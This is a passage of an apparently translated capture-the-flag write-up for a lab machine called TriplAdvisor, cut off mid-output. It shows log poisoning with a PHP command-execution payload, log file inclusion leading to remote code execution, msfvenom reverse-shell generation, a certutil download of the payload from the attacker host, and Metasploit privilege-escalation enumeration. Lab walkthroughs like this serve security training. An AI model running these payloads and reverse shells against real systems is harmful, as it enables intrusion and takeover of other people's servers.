&quot;c:\/WINDOWS\/system32\/drivers\/etc\/protocol&quot;                                                                                  \n000000222:   200        285 L    1238 W     17500 Ch    &quot;c:\/WINDOWS\/system32\/drivers\/etc\/services&quot;                                                                                  \n000000232:   200        2806 L   28871 W    227306 Ch   &quot;c:\/WINDOWS\/WindowsUpdate.log&quot;                                                                                              \n\nTotal time: 0\nProcessed Requests: 235\nFiltered Requests: 217\nRequests\/sec.: 0<\/code><\/pre>\n<p>Found a log file inclusion vulnerability, so we can try to exploit it:<\/p>\n<pre><code class=\"language-bash\">curl -A &quot;&lt;?php system(\\$_GET[&#039;cmd&#039;]);?&gt;&quot;  http:\/\/tripladvisor:8080\/wordpress\/ <\/code><\/pre>\n<p>But I seem to have broken the log, so I tried re-importing the image.... then tried again:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&amp;cmd=dir&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1&quot; 200 5728866 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 272 &quot;-&quot; 
&quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 504 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 736 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 968 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] &quot;GET \/ HTTP\/1.1&quot; 302 - &quot;-&quot; &quot;curl\/8.10.1&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1&quot; 200 1288 &quot;-&quot; &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] &quot;GET \/wordpress\/ HTTP\/1.1&quot; 200 22542 &quot;-&quot; &quot; Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of C:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes\n\n06\/30\/2024  10:00 AM    &lt;DIR&gt;          .\n06\/30\/2024  10:00 AM    &lt;DIR&gt;          ..\n06\/30\/2024  10:00 AM             9,400 ajax_shortcode_pattern.php\n06\/30\/2024  10:00 AM            26,382 pagebuilder-options-manager.class.php\n06\/30\/2024  10:00 AM            68,418 pagebuilder.class.php\n06\/30\/2024  10:00 AM             
5,561 pagebuildermodules.class.php\n06\/30\/2024  10:00 AM            34,306 pb-shortcodes.class.php\n06\/30\/2024  10:00 AM            16,293 pb-skin-loader.class.php\n               6 File(s)        160,360 bytes\n               2 Dir(s)  23,849,553,920 bytes free\n&quot;\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] &quot;POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1&quot; 200 - &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000&quot; &quot;WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress&quot;\n{&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:[]}}<\/code><\/pre>\n<p>RCE successful!<\/p>\n<h3>Getting a shell via RCE<\/h3>\n<p>First generate a reverse shell script:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom --payload windows\/x64\/shell_reverse_tcp LHOST=192.168.10.101 LPORT=1234 -f exe -o revshell.exe                                                                                \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes\nSaved as: revshell.exe<\/code><\/pre>\n<p>Then:<\/p>\n<pre><code class=\"language-bash\"># python3 -m http.server 8888 would also work, but a poor student always has lots of stationery....\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. 
Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit<\/code><\/pre>\n<p>Upload the local script, set up a listener, then trigger it:<\/p>\n<pre><code class=\"language-bash\"># set up the listener\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ sudo pwncat-cs -lp 1234 -m windows 2&gt;\/dev\/null     \n[02:34:30] Welcome to pwncat \ud83d\udc08!<\/code><\/pre>\n<p>Try downloading it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&amp;cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/revshell.exe+C:\\Windows\\Temp\\revshell.exe&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1&quot; 200 5728866 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 272 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 504 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] &quot;GET 
\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 736 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 968 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] &quot;GET \/ HTTP\/1.1&quot; 302 - &quot;-&quot; &quot;curl\/8.10.1&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1&quot; 200 1288 &quot;-&quot; &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] &quot;GET \/wordpress\/ HTTP\/1.1&quot; 200 22542 &quot;-&quot; &quot;****  Online  ****\n  0000  ...\n  1c00\nCertUtil: -URLCache command completed successfully.\n&quot;\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] &quot;POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1&quot; 200 - &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000&quot; &quot;WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:08:35 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=dir HTTP\/1.1&quot; 200 2754 &quot;-&quot; &quot;curl\/8.5.0&quot;\n{&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:[]}} 
<\/code><\/pre>\n<p>It has already been downloaded!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737266.png\" alt=\"image-20250604144106404\" style=\"zoom:50%;\" \/><\/p>\n<p>Then trigger it:<\/p>\n<pre><code class=\"language-bash\">http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&amp;cmd=C:\\Windows\\Temp\\revshell.exe<\/code><\/pre>\n<p>But the shell did not come back, so instead of pwncat I tried something else...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737267.png\" alt=\"image-20250604144537941\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737268.png\" alt=\"image-20250604144710481\" style=\"zoom:50%;\" \/><\/p>\n<p>The shell came back!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<p>First, I found a flag on the desktop..<\/p>\n<pre><code class=\"language-bash\">c:\\Users\\websvc\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\websvc\\Desktop\n\n08\/15\/2024  09:02 PM    &lt;DIR&gt;          .\n08\/15\/2024  09:02 PM    &lt;DIR&gt;          ..\n06\/30\/2024  10:10 AM                33 user.txt\n               1 File(s)             33 bytes\n               2 Dir(s)  23,848,247,296 bytes free\n\nc:\\Users\\websvc\\Desktop&gt;type user.txt\ntype user.txt\n4159a2b3a38697518722695cbb09ee46<\/code><\/pre>\n<p>Then gather some other information:<\/p>\n<pre><code class=\"language-bash\">c:\\Users\\websvc\\Desktop&gt;whoami \/all\nwhoami \/all\n\nUSER 
INFORMATION\n----------------\n\nUser Name           SID                                           \n=================== ==============================================\ntripladvisor\\websvc S-1-5-21-2621822639-2474692399-1676906194-1003\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                           Type             SID          Attributes                                        \n==================================== ================ ============ ==================================================\nEveryone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group\nLOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group\nMandatory Label\\High Mandatory Level Label            S-1-16-12288 Mandatory group, Enabled by default, Enabled group\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                               State   \n============================= ========================================= ========\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled \nSeImpersonatePrivilege        Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege  
     Create global objects                     Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled\n\nc:\\Users\\websvc\\Desktop&gt;ipconfig \/all\nipconfig \/all\n\nWindows IP Configuration\n\n   Host Name . . . . . . . . . . . . : TriplAdvisor\n   Primary Dns Suffix  . . . . . . . : \n   Node Type . . . . . . . . . . . . : Hybrid\n   IP Routing Enabled. . . . . . . . : No\n   WINS Proxy Enabled. . . . . . . . : No\n\nEthernet adapter Local Area Connection:\n\n   Connection-specific DNS Suffix  . : \n   Description . . . . . . . . . . . : Intel(R) PRO\/1000 MT Desktop Adapter\n   Physical Address. . . . . . . . . : 08-00-27-D3-33-DD\n   DHCP Enabled. . . . . . . . . . . : Yes\n   Autoconfiguration Enabled . . . . : Yes\n   IPv6 Address. . . . . . . . . . . : fd00:4c10:d50a:f900::1002(Preferred) \n   Lease Obtained. . . . . . . . . . : Wednesday, June 04, 2025 3:07:19 PM\n   Lease Expires . . . . . . . . . . : Thursday, June 05, 2025 3:07:19 PM\n   IPv6 Address. . . . . . . . . . . : fd00:4c10:d50a:f900:5479:dd94:1d27:478c(Deprecated) \n   Link-local IPv6 Address . . . . . : fe80::5479:dd94:1d27:478c%3(Preferred) \n   IPv4 Address. . . . . . . . . . . : 192.168.10.103(Preferred) \n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\n   Lease Obtained. . . . . . . . . . : Wednesday, June 04, 2025 3:06:56 PM\n   Lease Expires . . . . . . . . . . : Wednesday, June 04, 2025 5:06:56 PM\n   Default Gateway . . . . . . . . . : fe80::4e10:d5ff:fe0a:f900%3\n                                       192.168.10.1\n   DHCP Server . . . . . . . . . . . : 192.168.10.1\n   DHCPv6 IAID . . . . . . . . . . . : 50855975\n   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2D-F5-24-BC-08-00-27-B4-04-E4\n   DNS Servers . . . . . . . . . . . : fd00:4c10:d50a:f900:4e10:d5ff:fe0a:f900\n                                       192.168.1.1\n                                       192.168.10.1\n   NetBIOS over Tcpip. . . . . . . . 
: Enabled\n\nc:\\Users\\websvc\\Desktop&gt;systeminfo\nsysteminfo\n\nHost Name:                 TRIPLADVISOR\nOS Name:                   Microsoft Windows Server 2008 R2 Enterprise \nOS Version:                6.1.7600 N\/A Build 7600\nOS Manufacturer:           Microsoft Corporation\nOS Configuration:          Standalone Server\nOS Build Type:             Multiprocessor Free\nRegistered Owner:          Windows User\nRegistered Organization:   \nProduct ID:                00486-109-0000007-84212\nOriginal Install Date:     6\/7\/2024, 1:24:47 PM\nSystem Boot Time:          6\/4\/2025, 3:06:38 PM\nSystem Manufacturer:       innotek GmbH\nSystem Model:              VirtualBox\nSystem Type:               x64-based PC\nProcessor(s):              1 Processor(s) Installed.\n                           [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2578 Mhz\nBIOS Version:              innotek GmbH VirtualBox, 12\/1\/2006\nWindows Directory:         C:\\Windows\nSystem Directory:          C:\\Windows\\system32\nBoot Device:               \\Device\\HarddiskVolume1\nSystem Locale:             en-us;English (United States)\nInput Locale:              fr;French (France)\nTime Zone:                 (UTC-08:00) Pacific Time (US &amp; Canada)\nTotal Physical Memory:     4,353 MB\nAvailable Physical Memory: 3,482 MB\nVirtual Memory: Max Size:  8,703 MB\nVirtual Memory: Available: 7,796 MB\nVirtual Memory: In Use:    907 MB\nPage File Location(s):     C:\\pagefile.sys\nDomain:                    WORKGROUP\nLogon Server:              N\/A\nHotfix(s):                 N\/A\nNetwork Card(s):           1 NIC(s) Installed.\n                           [01]: Intel(R) PRO\/1000 MT Desktop Adapter\n                                 Connection Name: Local Area Connection\n                                 DHCP Enabled:    Yes\n                                 DHCP Server:     192.168.10.1\n                                 IP address(es)\n                                 [01]: 
192.168.10.103\n                                 [02]: fe80::5479:dd94:1d27:478c\n                                 [03]: fd00:4c10:d50a:f900:5479:dd94:1d27:478c\n                                 [04]: fd00:4c10:d50a:f900::1002<\/code><\/pre>\n<p>No good; I am not very familiar with Windows and this is all a blur to me, so let's bring up msf and look at the relevant information:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set payload windows\/x64\/shell_reverse_tcp\npayload =&gt; windows\/x64\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set LHOST 192.168.10.101 \nLHOST =&gt; 192.168.10.101\nmsf6 exploit(multi\/handler) &gt; set LPORT 1234\nLPORT =&gt; 1234\nmsf6 exploit(multi\/handler) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.101:1234 \n[*] Command shell session 1 opened (192.168.10.101:1234 -&gt; 192.168.10.103:49181) at 2025-06-04 03:11:07 -0400\n\nShell Banner:\nMicrosoft Windows [Version 6.1.7600]\n-----\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes&gt;<\/code><\/pre>\n<p>Use the relevant check script: press Ctrl+Z and choose y to put the current shell into the background.<\/p>\n<pre><code class=\"language-bash\">c:\\Windows\\Temp&gt;^Z\nBackground session 1? [y\/N]  y\nmsf6 exploit(multi\/handler) &gt; search local_exploit_suggest\n\nMatching Modules\n================\n\n   #  Name                                      Disclosure Date  Rank    Check  Description\n   -  ----                                      ---------------  ----    -----  -----------\n   0  post\/multi\/recon\/local_exploit_suggester  .                normal  No     Multi Recon Local Exploit Suggester\n\nInteract with a module by name or index. 
For example info 0, use 0 or use post\/multi\/recon\/local_exploit_suggester\n\nmsf6 exploit(multi\/handler) &gt; use 0\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; sessions\n\nActive sessions\n===============\n\n  Id  Name  Type               Information                                               Connection\n  --  ----  ----               -----------                                               ----------\n  1         shell x64\/windows  Shell Banner: Microsoft Windows [Version 6.1.7600] -----  192.168.10.101:1234 -&gt; 192.168.10.103:49181 (192.168.10.103)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; set session 1\nsession =&gt; 1\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; run\n\n[*] 192.168.10.103 - Collecting local exploits for x64\/windows...\n[*] 192.168.10.103 - 196 exploit checks are being tried...\n[*] Running check method for exploit 1 \/ 1\n[*] 192.168.10.103 - Valid modules for session 1:\n============================\n\n #  Name                                            Potentially Vulnerable?  
Check Result\n -  ----                                            -----------------------  ------------\n 1  exploit\/windows\/local\/win_error_cve_2023_36874  No                       The target is not exploitable.\n\n[*] Post module execution completed<\/code><\/pre>\n<p>No vulnerabilities found.... From here I was stuck for a long time; then I read the other masters' write-ups: the reason is that this shell is too limited, and you need to switch to meterpreter to do the enumeration....<\/p>\n<p>OK, starting over....<\/p>\n<pre><code class=\"language-bash\"># kali1\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.10.101 LPORT=1234 -f exe -o pentest.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 510 bytes\nFinal size of exe file: 7168 bytes\nSaved as: pentest.exe\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. 
Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 03:52:21] &quot;GET \/pentest.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 03:52:21] &quot;GET \/pentest.exe HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\"># kali2\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set payload windows\/x64\/meterpreter\/reverse_tcp\npayload =&gt; windows\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/handler) &gt; options\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST                      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Wildcard Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/handler) &gt; set LPORT 1234\nLPORT =&gt; 1234\nmsf6 exploit(multi\/handler) &gt; set LHOST 192.168.10.101\nLHOST =&gt; 192.168.10.101\nmsf6 exploit(multi\/handler) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.101:1234 \n[*] Sending stage (201798 bytes) to 192.168.10.103\n[*] Meterpreter session 1 opened (192.168.10.101:1234 -&gt; 192.168.10.103:49185) at 2025-06-04 03:52:57 -0400\n\nmeterpreter &gt; ipconfig\n\nInterface  1\n============\nName         : Software Loopback Interface 1\nHardware MAC : 00:00:00:00:00:00\nMTU          : 4294967295\nIPv4 Address : 127.0.0.1\nIPv4 Netmask : 255.0.0.0\nIPv6 Address : ::1\nIPv6 
Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\n\nInterface  3\n============\nName         : Intel(R) PRO\/1000 MT Desktop Adapter\nHardware MAC : 08:00:27:d3:33:dd\nMTU          : 1500\nIPv4 Address : 192.168.10.103\nIPv4 Netmask : 255.255.255.0\nIPv6 Address : fd00:4c10:d50a:f900::1002\nIPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\nIPv6 Address : fd00:4c10:d50a:f900:5479:dd94:1d27:478c\nIPv6 Netmask : ffff:ffff:ffff:ffff::\nIPv6 Address : fe80::5479:dd94:1d27:478c\nIPv6 Netmask : ffff:ffff:ffff:ffff::\n\nmeterpreter &gt; getuid\nServer username: TRIPLADVISOR\\websvc\nmeterpreter &gt; sysinfo\nComputer        : TRIPLADVISOR\nOS              : Windows Server 2008 R2 (6.1 Build 7600).\nArchitecture    : x64\nSystem Language : en_US\nDomain          : WORKGROUP\nLogged On Users : 1\nMeterpreter     : x64\/windows\nmeterpreter &gt; sessions -l\nUsage: sessions [options] or sessions [id]\n\nInteract with a different session ID.\n\nOPTIONS:\n\n    -h, --help           Show this message\n    -i, --interact &lt;id&gt;  Interact with a provided session ID\n\nmeterpreter &gt; shell\nProcess 2348 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes&gt;^Z\nBackground channel 1? 
[y\/N]  y\n\nmeterpreter &gt; background\n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) &gt; use post\/multi\/recon\/local_exploit_suggester\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; sessions -l\n\nActive sessions\n===============\n\n  Id  Name  Type                     Information                         Connection\n  --  ----  ----                     -----------                         ----------\n  1         meterpreter x64\/windows  TRIPLADVISOR\\websvc @ TRIPLADVISOR  192.168.10.101:1234 -&gt; 192.168.10.103:49185 (192.168.10.103)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; set session 1\nsession =&gt; 1\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; run\n\n[*] 192.168.10.103 - Collecting local exploits for x64\/windows...\n[*] 192.168.10.103 - 196 exploit checks are being tried...\n[+] 192.168.10.103 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2019_1458_wizardopium: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2021_40449: The service is running, but could not be validated. 
Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.103 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_075_reflection_juicy: The target appears to be vulnerable.\n[*] Running check method for exploit 45 \/ 45\n[*] 192.168.10.103 - Valid modules for session 1:\n============================\n\n #   Name                                                           Potentially Vulnerable?  Check Result\n -   ----                                                           -----------------------  ------------\n 1   exploit\/windows\/local\/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.\n 2   exploit\/windows\/local\/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.\n 3   exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 4   exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.\n 5   exploit\/windows\/local\/cve_2021_40449                           Yes                      The service is running, but could not be validated. 
Windows 7\/Windows Server 2008 R2 build detected!\n 6   exploit\/windows\/local\/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.\n 7   exploit\/windows\/local\/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.\n 8   exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.\n 9   exploit\/windows\/local\/ms16_075_reflection                      Yes                      The target appears to be vulnerable.\n 10  exploit\/windows\/local\/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable.\n 11  exploit\/windows\/local\/agnitum_outpost_acs                      No                       The target is not exploitable.\n 12  exploit\/windows\/local\/always_install_elevated                  No                       The target is not exploitable.\n 13  exploit\/windows\/local\/bits_ntlm_token_impersonation            No                       The target is not exploitable.\n 14  exploit\/windows\/local\/bypassuac_dotnet_profiler                No                       The target is not exploitable.\n 15  exploit\/windows\/local\/bypassuac_fodhelper                      No                       The target is not exploitable.\n 16  exploit\/windows\/local\/bypassuac_sdclt                          No                       The target is not exploitable.\n 17  exploit\/windows\/local\/bypassuac_sluihijack                     No                       The target is not exploitable.\n 18  exploit\/windows\/local\/canon_driver_privesc                     No                       The target is not exploitable. 
No Canon TR150 driver directory found\n 19  exploit\/windows\/local\/capcom_sys_exec                          No                       Cannot reliably check exploitability.\n 20  exploit\/windows\/local\/cve_2020_0796_smbghost                   No                       The target is not exploitable.\n 21  exploit\/windows\/local\/cve_2020_1048_printerdemon               No                       The target is not exploitable.\n 22  exploit\/windows\/local\/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.\n 23  exploit\/windows\/local\/cve_2020_1337_printerdemon               No                       The target is not exploitable.\n 24  exploit\/windows\/local\/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!\n 25  exploit\/windows\/local\/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.\n 26  exploit\/windows\/local\/cve_2022_21882_win32k                    No                       The target is not exploitable.\n 27  exploit\/windows\/local\/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a 